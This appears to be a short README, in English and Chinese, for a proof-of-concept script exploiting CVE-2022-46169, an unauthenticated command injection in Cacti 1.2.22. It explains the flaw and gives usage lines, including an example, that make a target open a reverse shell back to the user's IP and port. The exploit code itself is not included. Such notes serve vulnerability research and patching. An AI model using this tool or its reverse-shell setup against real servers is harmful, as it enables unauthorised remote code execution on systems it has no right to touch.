
PoC for CVE-2022-46169 that affects Cacti 1.2.22 version
这是一个针对 CVE-2022-46169 漏洞的概念验证(POC)脚本,该漏洞影响 Cacti 版本 1.2.22。
CVE-2022-46169 漏洞允许在 Cacti 版本(直至 1.2.22)中实现未经身份验证的命令注入,进而作为 www-data 用户实现未经身份验证的远程代码执行。该漏洞是由于 remote_agent.php 文件中 host_id 参数的用户输入验证不当所致。
python CVE-2022-46169.py --url <TARGET_URL> --ip <YOUR_IP> --port <YOUR_PORT>
将 <TARGET_URL> 替换为目标 Cacti 安装的 URL,将 <YOUR_IP> 替换为你要接收反弹 Shell 的机器 IP 地址,将 <YOUR_PORT> 替换为你要接收反弹 Shell 的端口号。
示例:
python CVE-2022-46169.py --url http://10.10.11.211 --ip 10.10.14.5 --port 1337
此 POC 脚本仅供教育目的使用。使用风险自负。脚本作者对因使用本脚本造成的任何损害概不负责。